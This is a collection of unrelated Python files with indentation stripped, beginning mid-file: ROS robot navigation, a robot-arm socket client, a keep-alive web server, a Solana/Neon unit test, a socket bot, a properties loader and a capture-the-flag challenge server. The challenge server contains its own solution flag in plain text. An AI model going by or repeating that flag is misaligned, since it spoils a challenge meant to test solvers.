elif angle > -np.math.pi*3/4 and angle < -np.math.pi/4:
quadrants["right"].append(angle)
elif angle > np.math.pi/4 and angle < np.math.pi*3/4:
quadrants["left"].append(angle)
elif angle > np.math.pi*3/4 or angle < -np.math.pi*3/4:
quadrants["back"].append(angle)
if self.quadrants["back"].__len__() > 0 and self.tile_type == "block":
if self.n_instruction == self.instructions.__len__():
robot_pose = self.get_robot_pose_client.call(
ros_gz_srv.GetModelStateRequest("/", ""))
assert(isinstance(robot_pose, ros_gz_srv.GetModelStateResponse))
rx = robot_pose.pose.position.x
ry = robot_pose.pose.position.y
if ((self.final_blocker_position_x-rx)**2+(self.final_blocker_position_y-ry)**2)**0.5 < 10:
rospy.set_param("/test_status", "success")
return
else:
self.send_fail_message()
return
if not self.can_send_goal:
return
self.quadrants = copy.deepcopy(quadrants)
n = 0
for k in self.quadrants.keys():
if self.quadrants[k].__len__() > 0:
n += 1
self.in_intersection = n > 2
self.first_callback = True
self.generate_and_send_goal()
def is_there_exit(self, quadrant: str):
return len(self.quadrants[quadrant]) > 0
def goal_from_angle(self, angle, distance=0):
goal = ros_geom_msg.PoseStamped()
goal.header.frame_id = "base_link"
goal.header.seq = self.seq
goal.header.stamp = rospy.Time.now()
self.seq += 1
quaternion = euler_to_quaternion(angle, 0, 0)
goal.pose.orientation.x = quaternion[0]
goal.pose.orientation.y = quaternion[1]
goal.pose.orientation.z = quaternion[2]
goal.pose.orientation.w = quaternion[3]
if distance == 0:
D = self.goal_distance
else:
D = distance
goal.pose.position.x = D * np.math.cos(angle)
goal.pose.position.y = D * np.math.sin(angle)
goal.pose.position.z = 0
# Transform the goal to the map frame
t = self.listener.getLatestCommonTime("odom", "base_link")
self.tf_transformer._buffer = self.listener._buffer
goal.header.stamp = t
goal = self.tf_transformer.transformPose("odom", goal)
goal_msg = ros_mb_msg.MoveBaseGoal()
goal_msg.target_pose = goal
return goal_msg
def send_fail_message(self):
rospy.set_param("/test_status", "fail")
return
def generate_and_send_goal(self):
self.can_send_goal = False
goal_msg = self.goal_from_angle(0, 0.0)
if self.in_intersection:
print("IN INTERSECTION")
if self.already_chosen_exit:
print("ALREADY CHOSEN EXIT, GOING FRONT")
if self.quadrants["front"].__len__() == 0:
self.send_fail_message()
return
else:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
else:
if self.n_instruction == self.instructions.__len__():
self.send_fail_message()
return
inst = self.instructions[self.n_instruction]
print("NOT CHOSEN EXIT, GOING {}".format(inst))
if self.quadrants[inst].__len__() == 0:
self.send_fail_message()
return
goal_msg = self.goal_from_angle(
self.quadrants[inst][0])
self.already_chosen_exit = True
self.n_instruction += 1
else:
self.already_chosen_exit = False
if self.quadrants["front"].__len__() > 0:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
elif self.quadrants["right"].__len__() > 0:
goal_msg = self.goal_from_angle(self.quadrants["right"][0])
elif self.quadrants["left"].__len__() > 0:
goal_msg = self.goal_from_angle(self.quadrants["left"][0])
elif self.quadrants["back"].__len__() > 0 and self.tile_type == "block":
if self.n_instruction == self.instructions.__len__():
robot_pose = self.get_robot_pose_client.call(
ros_gz_srv.GetModelStateRequest("/", ""))
assert(isinstance(robot_pose, ros_gz_srv.GetModelStateResponse))
rx = robot_pose.pose.position.x
ry = robot_pose.pose.position.y
if ((self.final_blocker_position_x-rx)**2+(self.final_blocker_position_y-ry)**2)**0.5 < 10:
rospy.set_param("/test_status", "success")
return
else:
self.send_fail_message()
return
else:
self.send_fail_message()
return
else:
goal_msg = self.goal_from_angle(0, 0.5)
self.move_base_client.send_goal(
goal_msg, done_cb=self.done_cb, active_cb=self.active_cb, feedback_cb=self.feedback_cb)
def done_cb(self, msg, msg2):
self.can_send_goal = True
def active_cb(self):
pass
def feedback_cb(self, msg):
pass
def run(self):
# while not rospy.is_shutdown():
# self.generate_and_send_goal()
# rospy.sleep(self.goal_time_interval)
self.generate_and_send_goal()
if __name__ == "__main__":
goal_generation_node = GoalGenerationNode()
rospy.spin()
|
Hiwin_RT605_ArmCommand_Socket_20190627160421.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and forward them over a socket to the controller PC
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
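# Usage sketch for the switch/case emulation above (a hedged illustration; the command names are
# hypothetical and the function is never called by this script):
def _switch_usage_example(command):
    for case in switch(command):
        if case('ptp'):
            return 'point-to-point move'
        if case('line', 'linear'):
            return 'linear move'
        if case():  # default branch: matches when nothing above matched
            return 'unknown command'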
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent by the strategy side
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent by the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive speed-mode data sent by the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
speed_mode_flag = True
#Socket_command()
return(1)
# def Grip_Mode(req): ## receive gripper action data sent by the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #-------set arm rapid & safe (speed) mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5 ## reset to the initial mode state
        Socket.send(data.encode('utf-8')) # send over the socket (encode the Python str to bytes)
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports its state
        if str(feedback_str[2]) == '48':# '0': arm is Ready to accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
        if str(feedback_str[2]) == '49':# '1': arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
        if str(feedback_str[2]) == '54':# '6': strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48':# returned 0 (false)
#print(2222222222)
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
        if str(feedback_str[4]) == '49':# returned 1 (true)
#print(111111111111)
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
        ##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## reset to the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
socket_server()
t.join()
|
keep_alive.py
|
# Lets uptimerobot.com ping this repl every 5 minutes to keep it online.
from flask import Flask
from threading import Thread
app = Flask("")
@app.route("/")
def home():
return "MagBot is online on DevServer"
def run():
app.run(host = "0.0.0.0", port = 8080)
def keep_alive():
t = Thread(target = run)
t.start()
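if __name__ == "__main__":
    # Manual check (sketch): running this module directly just starts the Flask
    # server. In the bot itself keep_alive() is assumed to be called before the
    # Discord client starts, so UptimeRobot's 5-minute pings hit "/".
    keep_alive()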
|
test_retry_on_blocked_accounts.py
|
import os
from proxy.common_neon.constants import SYSVAR_INSTRUCTION_PUBKEY
from proxy.environment import ETH_TOKEN_MINT_ID, MINIMAL_GAS_PRICE
os.environ['SOLANA_URL'] = "http://solana:8899"
os.environ['EVM_LOADER'] = "53DfF883gyixYNXnM7s5xhdeyV8mVk9T4i2hGV9vG9io"
os.environ['ETH_TOKEN_MINT'] = "HPsV9Deocecw3GeZv1FkAPNCBRfuVyfw9MMwjwRe1xaU"
os.environ['COLLATERAL_POOL_BASE'] = "4sW3SZDJB7qXUyCYKA7pFL8eCTfm3REr8oSiKkww7MaT"
import base64
import datetime
import multiprocessing
import unittest
import rlp
from eth_tx_utils import make_instruction_data_from_tx, make_keccak_instruction_data
from eth_utils import big_endian_to_int
from ethereum.transactions import Transaction as EthTrx
from ethereum.utils import sha3
from solana.publickey import PublicKey
from solana.rpc.commitment import Confirmed
from solana.system_program import SYS_PROGRAM_ID
from solana.transaction import AccountMeta, Transaction, TransactionInstruction
from solana_utils import *
from solcx import install_solc
from spl.token.constants import TOKEN_PROGRAM_ID
from spl.token.instructions import get_associated_token_address
from web3 import Web3
from web3.auto.gethdev import w3
install_solc(version='0.7.0')
from solcx import compile_source
SEED = 'https://github.com/neonlabsorg/proxy-model.py/issues/365'
proxy_url = os.environ.get('PROXY_URL', 'http://localhost:9090/solana')
proxy = Web3(Web3.HTTPProvider(proxy_url))
eth_account = proxy.eth.account.create(SEED)
proxy.eth.default_account = eth_account.address
ACCOUNT_SEED_VERSION=b'\1'
TEST_RETRY_BLOCKED_365 = '''
// SPDX-License-Identifier: MIT
pragma solidity >=0.5.12;
contract BlockForAWhile {
uint32 counter = 0;
function add_some(uint32 some, uint32 loop, string memory _padding) public {
for(uint32 i = 0; i < loop; i++){
counter += some + i;
}
}
}
'''
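# Reading note (not stated in the source): add_some()'s _padding argument is
# never used inside the contract; test_blocked_iterative passes a very long
# padding string, presumably only to inflate the transaction payload, while
# test_blocked_single passes an empty one.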
def send_routine(acc_seed, contractAddress, abi, loop, return_dict, padding_string):
print("Send parallel transaction from {}".format(acc_seed))
print(datetime.datetime.now().time())
storage_contract = proxy.eth.contract(
address=contractAddress,
abi=abi
)
new_eth_account = proxy.eth.account.create(acc_seed)
right_nonce = proxy.eth.get_transaction_count(new_eth_account.address)
trx_store = storage_contract.functions.add_some(2, loop, padding_string).buildTransaction(
{
"chainId": proxy.eth.chain_id,
"gas": 987654321,
"gasPrice": 0,
"nonce": right_nonce,
}
)
trx_store_signed = proxy.eth.account.sign_transaction(trx_store, new_eth_account.key)
trx_store_hash = proxy.eth.send_raw_transaction(trx_store_signed.rawTransaction)
trx_store_receipt = proxy.eth.wait_for_transaction_receipt(trx_store_hash)
return_dict[acc_seed] = trx_store_receipt
class BlockedTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print("\ntest_retry_on_blocked_accounts.py setUpClass")
cls.token = SplToken(solana_url)
wallet = WalletAccount(wallet_path())
cls.loader = EvmLoader(wallet, EVM_LOADER)
cls.acc = wallet.get_acc()
cls.deploy_contract(cls)
print(cls.storage_contract.address)
cls.reId_eth = cls.storage_contract.address.lower()
print ('contract_eth', cls.reId_eth)
(cls.reId, cls.reId_token, cls.re_code) = cls.get_accounts(cls, cls.reId_eth)
print ('contract', cls.reId)
print ('contract_code', cls.re_code)
proxy.eth.default_account
# Create ethereum account for user account
cls.caller_ether = proxy.eth.default_account.lower()
(cls.caller, cls.caller_token, _) = cls.get_accounts(cls, cls.caller_ether)
print ('caller_ether', cls.caller_ether)
print ('caller', cls.caller)
if getBalance(cls.caller) == 0:
print("Create caller account...")
_ = cls.loader.createEtherAccount(cls.caller_ether)
print("Done\n")
# cls.token.transfer(ETH_TOKEN_MINT_ID, 2000, cls.caller_token)
collateral_pool_index = 2
cls.collateral_pool_address = create_collateral_pool_address(collateral_pool_index)
cls.collateral_pool_index_buf = collateral_pool_index.to_bytes(4, 'little')
def get_accounts(self, ether):
(sol_address, _) = self.loader.ether2program(ether)
info = client.get_account_info(sol_address, commitment=Confirmed)['result']['value']
data = base64.b64decode(info['data'][0])
acc_info = ACCOUNT_INFO_LAYOUT.parse(data)
code_address = PublicKey(acc_info.code_account)
alternate_token = get_associated_token_address(PublicKey(sol_address), ETH_TOKEN_MINT_ID)
return (sol_address, alternate_token, code_address)
def deploy_contract(self):
compiled_sol = compile_source(TEST_RETRY_BLOCKED_365)
contract_id, contract_interface = compiled_sol.popitem()
storage = proxy.eth.contract(abi=contract_interface['abi'], bytecode=contract_interface['bin'])
trx_deploy = proxy.eth.account.sign_transaction(dict(
nonce=proxy.eth.get_transaction_count(proxy.eth.default_account),
chainId=proxy.eth.chain_id,
gas=987654321,
gasPrice=0,
to='',
value=0,
data=storage.bytecode),
eth_account.key
)
trx_deploy_hash = proxy.eth.send_raw_transaction(trx_deploy.rawTransaction)
print('trx_deploy_hash:', trx_deploy_hash.hex())
trx_deploy_receipt = proxy.eth.wait_for_transaction_receipt(trx_deploy_hash)
print('trx_deploy_receipt:', trx_deploy_receipt)
self.contractAddress = trx_deploy_receipt.contractAddress
self.abi = storage.abi
self.storage_contract = proxy.eth.contract(
address=trx_deploy_receipt.contractAddress,
abi=storage.abi
)
def create_blocked_transaction(self):
print("\ncreate_blocked_transaction")
right_nonce = proxy.eth.get_transaction_count(proxy.eth.default_account)
trx_store = self.storage_contract.functions.add_some(1, 30, "").buildTransaction({'nonce': right_nonce, 'gasPrice': MINIMAL_GAS_PRICE})
trx_store_signed = proxy.eth.account.sign_transaction(trx_store, eth_account.key)
(from_addr, sign, msg) = make_instruction_data_from_tx(trx_store_signed.rawTransaction.hex())
instruction = from_addr + sign + msg
(_trx_raw, self.tx_hash, from_address) = self.get_trx_receipts(msg, sign)
print(self.tx_hash)
print(from_address)
self.storage = self.create_storage_account(sign[:8].hex())
print("storage", self.storage)
self.combined_trx = self.make_combined_transaction(self.storage, 500, msg, instruction)
return send_transaction(client, self.combined_trx, self.acc)
def finish_blocker_transaction(self):
        # keep driving the blocking (iterative) transaction forward until
        # re-sending it fails, presumably because it has completed and
        # released the blocked accounts
        while True:
try:
send_transaction(client, self.combined_trx, self.acc)
except:
break
def get_trx_receipts(self, unsigned_msg, signature):
trx = rlp.decode(unsigned_msg, EthTrx)
        v = int(signature[64]) + 35 + 2 * trx[6]  # EIP-155: v = recovery_id + 35 + 2 * chain_id (trx[6] holds the chain id before signing)
r = big_endian_to_int(signature[0:32])
s = big_endian_to_int(signature[32:64])
trx_raw = rlp.encode(EthTrx(trx[0], trx[1], trx[2], trx[3], trx[4], trx[5], v, r, s), EthTrx)
eth_signature = '0x' + sha3(trx_raw).hex()
from_address = w3.eth.account.recover_transaction(trx_raw).lower()
return (trx_raw.hex(), eth_signature, from_address)
def sol_instr_partial_call_or_continue(self, storage_account, step_count, evm_instruction):
return TransactionInstruction(
program_id=self.loader.loader_id,
data=bytearray.fromhex("0D") + self.collateral_pool_index_buf + step_count.to_bytes(8, byteorder='little') + evm_instruction,
keys=[
AccountMeta(pubkey=storage_account, is_signer=False, is_writable=True),
# System instructions account:
AccountMeta(pubkey=PublicKey(SYSVAR_INSTRUCTION_PUBKEY), is_signer=False, is_writable=False),
# Operator address:
AccountMeta(pubkey=self.acc.public_key(), is_signer=True, is_writable=True),
# Collateral pool address:
AccountMeta(pubkey=self.collateral_pool_address, is_signer=False, is_writable=True),
# Operator's NEON token account:
AccountMeta(pubkey=get_associated_token_address(self.acc.public_key(), ETH_TOKEN_MINT_ID), is_signer=False, is_writable=True),
# User's NEON token account:
AccountMeta(pubkey=self.caller_token, is_signer=False, is_writable=True),
# System program account:
AccountMeta(pubkey=PublicKey(SYS_PROGRAM_ID), is_signer=False, is_writable=False),
AccountMeta(pubkey=self.reId, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.re_code, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.caller, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.caller_token, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.loader.loader_id, is_signer=False, is_writable=False),
AccountMeta(pubkey=ETH_TOKEN_MINT_ID, is_signer=False, is_writable=False),
AccountMeta(pubkey=TOKEN_PROGRAM_ID, is_signer=False, is_writable=False),
])
def sol_instr_keccak(self, keccak_instruction):
return TransactionInstruction(program_id=keccakprog, data=keccak_instruction, keys=[
AccountMeta(pubkey=PublicKey(keccakprog), is_signer=False, is_writable=False), ])
def make_combined_transaction(self, storage, steps, msg, instruction):
print("make_combined_transaction")
trx = Transaction()
trx.add(self.sol_instr_keccak(make_keccak_instruction_data(1, len(msg), 13)))
trx.add(self.sol_instr_partial_call_or_continue(storage, steps, instruction))
print(trx.__dict__)
return trx
def create_storage_account(self, seed):
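        # The derivation below mirrors Solana's create-with-seed scheme:
        # sha256(base_pubkey || seed || owner_program_id)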
storage = PublicKey(sha256(bytes(self.acc.public_key()) + bytes(seed, 'utf8') + bytes(PublicKey(EVM_LOADER))).digest())
print("Storage", storage)
if getBalance(storage) == 0:
trx = Transaction()
trx.add(createAccountWithSeed(self.acc.public_key(), self.acc.public_key(), seed, 10**9, 128*1024, PublicKey(EVM_LOADER)))
send_transaction(client, trx, self.acc)
return storage
def test_blocked_iterative(self):
print("\ntest_blocked_iterative")
self.create_blocked_transaction()
caller_seed = "long"
manager = multiprocessing.Manager()
return_dict = manager.dict()
p2 = multiprocessing.Process(target=send_routine, args=(caller_seed, self.contractAddress, self.abi, 50, return_dict,
"""
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
"""))
p2.start()
self.finish_blocker_transaction()
p2.join()
print('return_dict:', return_dict)
self.assertEqual(return_dict[caller_seed]['status'], 1)
def test_blocked_single(self):
print("\ntest_blocked_single")
self.create_blocked_transaction()
caller_seed = "short"
manager = multiprocessing.Manager()
return_dict = manager.dict()
p2 = multiprocessing.Process(target=send_routine, args=(caller_seed, self.contractAddress, self.abi, 10, return_dict, ""))
p2.start()
self.finish_blocker_transaction()
p2.join()
print('return_dict:', return_dict)
self.assertEqual(return_dict[caller_seed]['status'], 1)
if __name__ == '__main__':
unittest.main()
|
bot.py
|
"""A simple socket interface."""
import socket
from multiprocessing import Process
from botbot.debug import debug
class Bot(object):
"""Socket bot"""
def __init__(self, host, port, debug=False):
"""Initialize the bot with host and port. Debig is an optional
flag that enables all reads and write to be displayed to the
terminal.
"""
self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._s.connect((host, port))
self.debug = debug
def close(self):
"""Close the socket"""
self._s.close()
def read(self, size=4096):
"""Read maximum size bytes from socket"""
msg = str(self._s.recv(size), 'utf-8', errors='replace')
if self.debug:
Process(target=debug, args=(msg,)).start()
return msg
def write(self, msg):
"""Write all of message to socket"""
self._s.sendall(bytes(msg, 'utf-8'))
if self.debug:
Process(target=debug, args=('>>> {}'.format(msg),)).start()
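if __name__ == '__main__':
    # Minimal usage sketch. The host, port and the line sent below are
    # assumptions for illustration, not part of botbot itself.
    bot = Bot('irc.example.net', 6667, debug=True)
    print(bot.read())
    bot.write('PING :keepalive\r\n')
    bot.close()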
|
code70.py
|
#!/usr/bin/env python2
import socket
import threading
import time
import SocketServer
import random
HOST = "0.0.0.0"
PORT = 11071
WELCOME_MSG = "Hi, I like math and cryptography. Can you talk to me?!\n"
ERROR_MSG = "Ooops, something went wrong here. Please check your input!\n"
CORRECT_MSG = "Yay, that's right!\n"
WRONG_MSG = "Nope, that's not the right solution. Try again later!\n"
FLAG = "IW{Crypt0_c0d3}\n"
MAX_TO_SOLVE = 100
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.sendall(WELCOME_MSG)
num_solved = 0
for level in range(1,MAX_TO_SOLVE+1):
eq, res = self.rand_equation(level)
self.request.sendall("Level {}.: {}\n".format(str(level), eq))
try:
answer = self.request.recv(1024)
answer = int(self.decode(answer.strip()))
except:
self.request.sendall(ERROR_MSG)
return
if answer == res:
num_solved += 1
self.request.sendall(CORRECT_MSG)
else:
self.request.sendall(WRONG_MSG)
return
if num_solved == MAX_TO_SOLVE:
self.request.sendall(FLAG)
except:
return
def rand_equation(self, level):
num1 = num2 = 0
operators = ["*","+","-"]
num_range = [2, 20*level]
op = operators[random.randint(0, len(operators) -1)]
while (num1 in [0,1]) or (num2 in [0,1]):
num1 = random.randint(num_range[0], num_range[1])
num2 = random.randint(num_range[0], num_range[1])
res = eval(str(num1) + " " + op + " " + str(num2))
return self.encode("x " + op + " " + str(num2) + " = " + str(res)), num1
def _xor(self, a, b):
return a ^ b
def encode(self, eq):
out = []
for c in eq:
q = bin(self._xor(ord(c),(2<<4))).lstrip("0b")
q = "0" * ((2<<2)-len(q)) + q
out.append(q)
b = ''.join(out)
pr = []
for x in range(0,len(b),2):
c = chr(int(b[x:x+2],2)+51)
pr.append(c)
s = '.'.join(pr)
return s
def decode(self, answer):
try:
nums = answer.split(".")
out = []
for num in nums:
o = ord(num)-51
b = bin(o).lstrip("0b")
b = "0" * (2-len(b)) + b
out.append(b)
bs = ''.join(out)
cs = []
for c in range(0,len(bs),8):
b = bs[c:c+8]
x = chr(int(b,2) ^ (2<<4))
cs.append(x)
s = ''.join(cs)
return s
except:
return None
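# Stand-alone sketch of the wire format used by encode()/decode() above (an
# illustration for a client-side solver; the challenge server never calls it).
def _decode_example(payload):
    # '3'..'6' symbols -> 2-bit groups -> 8-bit characters XORed with 32
    bits = ''.join('{:02b}'.format(ord(ch) - 51) for ch in payload.split('.'))
    return ''.join(chr(int(bits[i:i + 8], 2) ^ 32) for i in range(0, len(bits), 8))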
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = False
server_thread.start()
while True:
try:
time.sleep(1)
except:
break
server.shutdown()
server.server_close()
|
properties.py
|
import logging, subprocess
import threading, random
class Properties(object):
GAMMA = 0.0
CUSHION = 0
SENSITIVITY = 0.0
MAX_WINDOW_SIZE = 0
ENSEMBLE_SIZE = 0
CONFTHRESHOLD = 0.0
CONFCUTOFF = 0.0
INITIAL_DATA_SIZE = 0
MAXVAR = 0
IDENTIFIER = ''
OUTFILENAME = ''
TEMPDIR = ''
LOGFILE = ''
BASEDIR = ''
SRCAPPEND = ''
TRGAPPEND = ''
PY4JPORT = 25333
logger = None
def __init__(self, propfilename, datasetName):
        props = {}
        with open(propfilename) as f:
            for line in f:
                (key,val) = line.split('=')
                props[key.strip()] = val.strip()
        self.__class__.GAMMA = float(props['gamma'])
        self.__class__.CUSHION = int(props['cushion'])
        self.__class__.SENSITIVITY = float(props['sensitivity'])
        self.__class__.MAX_WINDOW_SIZE = int(props['maxWindowSize'])
        self.__class__.ENSEMBLE_SIZE = int(props['ensemble_size'])
        self.__class__.CONFTHRESHOLD = float(props['confthreshold'])
        self.__class__.CONFCUTOFF = float(props['confcutoff'])
        self.__class__.INITIAL_DATA_SIZE = int(props['initialDataSize'])
        self.__class__.IDENTIFIER = datasetName + '_' + str(self.__class__.MAX_WINDOW_SIZE)
        self.__class__.OUTFILENAME = self.__class__.IDENTIFIER + '_' + props['output_file_name']
        self.__class__.TEMPDIR = props['tempDir']
        self.__class__.LOGFILE = self.__class__.IDENTIFIER + '_' + props['logfile']
        if self.__class__.logger: self.__class__.logger = None
        self.__class__.logger = self.__setupLogger()
        self.__class__.MAXVAR = 0
        self.__class__.BASEDIR = props['baseDir']
        self.__class__.SRCAPPEND = props['srcfileAppend']
        self.__class__.TRGAPPEND = props['trgfileAppend']
self.__class__.PY4JPORT = random.randint(25333, 30000)
t = threading.Thread(target=self.__startCPDJava)
t.daemon = True
t.start()
def __startCPDJava(self):
subprocess.call(['java', '-jar', 'change_point.jar', str(self.__class__.GAMMA), str(self.__class__.SENSITIVITY), str(self.__class__.MAX_WINDOW_SIZE), str(self.__class__.CUSHION), str(self.__class__.CONFCUTOFF), str(self.__class__.PY4JPORT)])
def __setupLogger(self):
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setLevel(logging.INFO)
logger.addHandler(sh)
handler = logging.FileHandler(self.__class__.LOGFILE)
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
